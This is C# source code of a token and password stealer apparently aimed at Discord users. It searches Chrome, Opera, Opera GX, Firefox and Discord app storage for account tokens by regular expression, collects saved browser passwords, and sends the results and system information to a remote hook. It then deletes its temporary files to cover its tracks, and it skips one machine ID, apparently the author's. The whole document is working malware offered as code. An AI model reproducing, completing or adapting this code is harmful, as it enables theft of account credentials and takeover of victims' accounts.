public static void StartSteal() { using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64)) { using (RegistryKey registryKey2 = registryKey.OpenSubKey("SOFTWARE\\Microsoft\\Cryptography")) { if (!(Convert.ToString(registryKey2.GetValue("MachineGuid")) == "90059c37-1320-41a4-b58d-2b75a9850d2f")) { try { Stealer.StealTokenFromChrome(); Stealer.StealTokenFromOpera(); Stealer.StealTokenFromOperaGX(); Stealer.StealTokenFromDiscordApp(); Stealer.StealTokenFromFirefox(); Stealer.Send(File.ReadAllText(Stealer._path)); if (File.Exists(Stealer._path)) { File.Delete(Stealer._path); } } catch (Exception) { } } } } }
private static string SaveTokens(string token) { if (!(token == "")) { string text = ""; if (Stealer.Chrome) { text = "```Chrome"; } else if (Stealer.Opera) { text = "```Opera"; } else if (Stealer.App) { text = "```Discord App"; } else if (Stealer.OperaGX) { text = "```Opera GX"; } else { text = "```Unknown"; } text = text + " Token :: " + token + "```"; File.AppendAllText(Stealer._path, text); Stealer.RemoveDuplicatedLines(Stealer._path); } return(token); }
private static void Main(string[] args) { new API(API.Hook) { _name = API.name, _ppUrl = API.pfp }.SendSysInfo("**SYSTEM INFO**", "C:/temp/System_INFO.txt"); File.Delete("C:/temp/System_INFO.txt"); File.Delete("C:/temp/finalres.vbs"); File.Delete("C:/temp/WebBrowserPassView.exe"); API.Passwords(); Stealer.StartSteal(); Environment.Exit(0); }
private static void StealTokenFromOperaGX() { string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\"; DirectoryInfo folder = new DirectoryInfo(path); if (Directory.Exists(path)) { Stealer.OperaGX = true; List <string> list = Stealer.TokenStealer(folder, false); if (list != null && list.Count > 0) { Stealer.OperaGX = true; } } }
private static void StealTokenFromChrome() { string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\"; DirectoryInfo folder = new DirectoryInfo(path); if (Directory.Exists(path)) { Stealer.Chrome = true; List <string> list = Stealer.TokenStealer(folder, false); if (list != null && list.Count > 0) { Stealer.Chrome = true; } } }
private static void StealTokenFromFirefox() { string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles\\"; if (Directory.Exists(path)) { foreach (string text in Directory.EnumerateFiles(path, "webappsstore.sqlite", SearchOption.AllDirectories)) { List <string> list = Stealer.TokenStealerForFirefox(new DirectoryInfo(text.Replace("webappsstore.sqlite", "")), false); if (list != null && list.Count > 0) { foreach (string str in (from t in list where !Stealer.App select t).Select(new Func <string, string>(Stealer.TokenCheckAcces))) { Stealer.Firefox = true; File.AppendAllText(Stealer._path, "Firefox Token: " + str + Environment.NewLine); } } } } }
private static List <string> TokenStealer(DirectoryInfo Folder, bool checkLogs = false) { List <string> list = new List <string>(); try { FileInfo[] files = Folder.GetFiles(checkLogs ? "*.log" : "*.ldb"); for (int i = 0; i < files.Length; i++) { string input = files[i].OpenText().ReadToEnd(); foreach (object obj in Regex.Matches(input, @"[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}")) { Stealer.SaveTokens(Stealer.TokenCheckAcces(((Match)obj).Value)); } foreach (object obj2 in Regex.Matches(input, @"mfa\.[a-zA-Z0-9_\-]{84}")) { Stealer.SaveTokens(Stealer.TokenCheckAcces(((Match)obj2).Value)); } } } catch { } list = list.Distinct <string>().ToList <string>(); if (list.Count > 0) { Stealer.StealFound = true; List <string> list2 = list; int index = list.Count - 1; list2[index] = (list2[index] ?? ""); } Stealer.Firefox = false; Stealer.Opera = false; Stealer.Chrome = false; Stealer.App = false; Stealer.OperaGX = false; return(list); }